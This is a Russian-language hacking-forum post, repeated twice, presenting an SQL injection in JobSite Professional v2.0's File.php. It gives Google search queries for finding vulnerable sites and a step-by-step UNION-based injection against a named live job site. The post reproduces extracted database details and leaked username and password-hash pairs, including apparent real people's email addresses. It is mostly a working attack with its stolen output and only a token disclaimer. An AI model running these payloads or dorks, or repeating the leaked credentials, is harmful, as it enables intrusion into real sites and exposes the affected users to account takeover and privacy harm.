-=lebed=-
08.11.2007, 18:51
Программа: JobSite Professional v2.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием File.php?. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
http://[site]/File.php?id=[sql]
Поиск в Гугл:
inurl:index.php?page=en_jobseekers - английская версия
inurl:index.php?page=fr_Candidats - французская версия
Пример:
_www.milkround.ie
Cмотрим версию мускула, пользователя, базу:
_http://www.milkround.ie/file.php?id=-1+union+select+1,2,concat(version(),0x3a,user(),0x 3a,database()),4,5,6,7,8/*
5.0.24a-standard:jobs_portal@localhost:jobs_portal
Смотрим названия таблиц, меняя лимит:
_http://www.milkround.ie/file.php?id=-1+union+select+1,2,table_name,4,5,6,7,8+from+infor mation_schema.tables+limit+1,1/*
всего 106 таблиц.
Интересные таблицы:
_http://www.milkround.ie/file.php?id=-1+UNION+SELECT+1,2,CONCAT(USERNAME,0x3a,PASSWORD), 4,5,6,7,8+FROM+websiteadmin_admin_users/*
_http://www.milkround.ie/file.php?id=-1+UNION+SELECT+1,2,CONCAT(USERNAME,0x3a,PASSWORD), 4,5,6,7,8+FROM+websiteadmin_ext_jobseekers/*
_http://www.milkround.ie/file.php?id=-1+UNION+SELECT+1,2,CONCAT(USERNAME,0x3a,PASSWORD), 4,5,6,7,8+FROM+websiteadmin_ext_employers/*
administrator:61ff6c39c7925044f061566f4c21b267
scottbrien@hotmail.com:18859128760e989630b7d2073db 3f1ba
lizodonovan@eircom.net:cb0be83e6cb9e65c62da133391b 77a49
PS. Пример использования уязвимости, представлен только для ознакомления, все незаконные действия совершаемые Вами могут быть уголовно наказуемы и вся ответственность за неправоменрные действия лежит на вас.
AUTHOR : (нашёл уязвимость) ZynbER, пример мой ;-)
www.milw0rm.com
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием File.php?. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
http://[site]/File.php?id=[sql]
Поиск в Гугл:
inurl:index.php?page=en_jobseekers - английская версия
inurl:index.php?page=fr_Candidats - французская версия
Пример:
_www.milkround.ie
Cмотрим версию мускула, пользователя, базу:
_http://www.milkround.ie/file.php?id=-1+union+select+1,2,concat(version(),0x3a,user(),0x 3a,database()),4,5,6,7,8/*
5.0.24a-standard:jobs_portal@localhost:jobs_portal
Смотрим названия таблиц, меняя лимит:
_http://www.milkround.ie/file.php?id=-1+union+select+1,2,table_name,4,5,6,7,8+from+infor mation_schema.tables+limit+1,1/*
всего 106 таблиц.
Интересные таблицы:
_http://www.milkround.ie/file.php?id=-1+UNION+SELECT+1,2,CONCAT(USERNAME,0x3a,PASSWORD), 4,5,6,7,8+FROM+websiteadmin_admin_users/*
_http://www.milkround.ie/file.php?id=-1+UNION+SELECT+1,2,CONCAT(USERNAME,0x3a,PASSWORD), 4,5,6,7,8+FROM+websiteadmin_ext_jobseekers/*
_http://www.milkround.ie/file.php?id=-1+UNION+SELECT+1,2,CONCAT(USERNAME,0x3a,PASSWORD), 4,5,6,7,8+FROM+websiteadmin_ext_employers/*
administrator:61ff6c39c7925044f061566f4c21b267
scottbrien@hotmail.com:18859128760e989630b7d2073db 3f1ba
lizodonovan@eircom.net:cb0be83e6cb9e65c62da133391b 77a49
PS. Пример использования уязвимости, представлен только для ознакомления, все незаконные действия совершаемые Вами могут быть уголовно наказуемы и вся ответственность за неправоменрные действия лежит на вас.
AUTHOR : (нашёл уязвимость) ZynbER, пример мой ;-)
www.milw0rm.com